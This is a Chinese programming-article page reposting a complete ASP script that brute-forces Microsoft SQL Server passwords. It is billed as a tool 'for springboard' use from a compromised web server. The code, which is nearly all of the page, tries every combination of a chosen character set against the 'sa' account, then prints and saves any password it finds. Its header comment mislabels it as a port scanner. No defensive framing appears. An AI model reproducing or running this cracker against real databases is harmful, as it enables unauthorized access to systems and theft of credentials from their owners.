欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

一个暴力破解MSSQL用户密码的ASP程序

程序员文章站 2022-03-26 19:41:13
作者: knight 一个暴力mssql用户密码的asp程序,以下这个版本是可以运行之后关闭,运行完毕将在当前目录生成结果文件的。 code:[copy to clipboard]<%====...

作者: knight

一个暴力mssql用户密码的asp程序,以下这个版本是可以运行之后关闭,运行完毕将在当前目录生成结果文件的。


code:
[copy to clipboard]
<%
============ asp port scanner by lake2 ===================
http://lake2.0x54.org
version: 0.1
for springboard
==========================================================
%>
<style type="text/css">
body,td,th {color: #0000ff;font-family: verdana, arial, helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000ff;text-decoration: none;}
a:visited {text-decoration: none;color: #0000ff;}
a:hover {text-decoration: none;color: #ff0000;}
a:active {text-decoration: none;color: #ff0000;}
.buttom {color: #ffffff; border: 1px solid #084b8e; background-color: #719bc5}
.textbox {border: 1px solid #084b8e}
.stylered {color: #ff0000}
</style>
<title>mssql cracker for springboard</title>
<%
dim password()
if request.form("go") <> "1" then
%>
    <p align="center">welcome to <a href="" target="_blank">http://lake2.0x54.org</a> </p>
    <form name="form1" method="post" action="" onsubmit="form1.submit.disabled=true;">
     connstr:
     <input name="conn" type="text" class="textbox" id="conn" value="provider=sqloledb.1;data source=127.0.0.1;user id=sa;password={pass};" size="70">
     <br>
     char:    
     <input name="char" type="text" class="textbox" id="char" value="0123456789" size="30">
   <br>
length: 
<input name="len" type="text" class="textbox" id="len" value="3" size="4">
<br>
path:    
<input name="path" type="text" class="textbox" value="<%=server.mappath("r.txt")%>" size="50">
<input name="cfile" type="checkbox" class="textbox" id="cfile" value="1" checked>
enablel<br>
<input name="go" type="hidden" id="go" value="1">
<br>
<input name="submit" type="submit" class="buttom" id="submit" value=" run ">
</form>
<%
else
    timer1 = timer
    server.scripttimeout = 7776000
    connstr = request.form("conn")
    char = request.form("char")
    lenchar = len(char)
    redim password(lenchar)
    for i = 1 to lenchar
    password(i) = mid(char, i, 1)
    next
    length = cint(request.form("len"))
    call lake("")
    response.write "done!<br>process " & ttime & " s"
    if request.form("cfile") <> "" then createresult("done!" & vbcrlf & ttime)
end if

sub lake(str)
    if len(str) >= length then exit sub
    for j = 1 to lenchar
    pass = str & password(j)
    if len(pass) = length then call crack(pass)
    call lake(pass)
    next
end sub


sub crack(str)
    on error resume next
    set conn = server.createobject("adodb.connection")
    conn.open replace(connstr,"{pass}",str)
    if err then
    if err.number <> -2147217843 then
    response.write(err.description & "<br>")
    response.end()
    end if
    else
    response.write("i get it ! password is <font color=red>" & str & "</font><br>process " & ttime & " s")
    if request.form("cfile") <> "" then createresult(str & vbcrlf & ttime)
    response.end()
    end if
end sub


function ttime()
    timer2 = timer
    thetime=cstr(int(timer2-timer1))
    ttime = thetime
end function


sub createresult(t)
    set fs = createobject("scripting.filesystemobject")
    set outfile = fs.createtextfile(request.form("path"))
    outfile.writeline t
    set fs = nothing
end sub
%>